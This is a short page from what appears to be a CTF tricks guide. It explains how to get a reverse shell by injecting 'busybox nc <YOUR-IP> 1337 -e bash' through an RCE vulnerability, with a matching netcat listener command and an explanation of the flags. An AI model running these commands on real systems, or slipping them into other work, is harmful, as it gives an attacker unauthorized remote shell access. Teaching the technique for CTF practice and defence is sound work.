> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/reverse-shell/trick-0595.md).

# Get Reverse Shell via Busybox Netcat

***

Inject the following command via an RCE vulnerability:

```bash
busybox nc <YOUR-IP> 1337 -e bash
```

This utilizes the busybox `nc` applet's `-e` option to execute the `/bin/bash` shell and connect its standard input/output to the outgoing network connection back to your machine. BusyBox is described as The Swiss Army Knife of Embedded Linux, containing many common UNIX utilities. The `-e` option is a common way to execute a program after establishing a connection with netcat, effectively providing a reverse shell.

Before injecting the command, ensure you have a listener set up on your attacking machine on the specified port:

```bash
nc -lvnp 1337
```

This command sets up a listener on port 1337 on your machine. The `-l` flag tells `nc` to listen for an incoming connection, `-v` provides verbose output, `-n` prevents DNS lookups, and `-p` specifies the port number. When the target machine successfully executes the `busybox nc` command, it will connect back to this listener, and the shell (`/bin/bash`) will be passed over the connection.
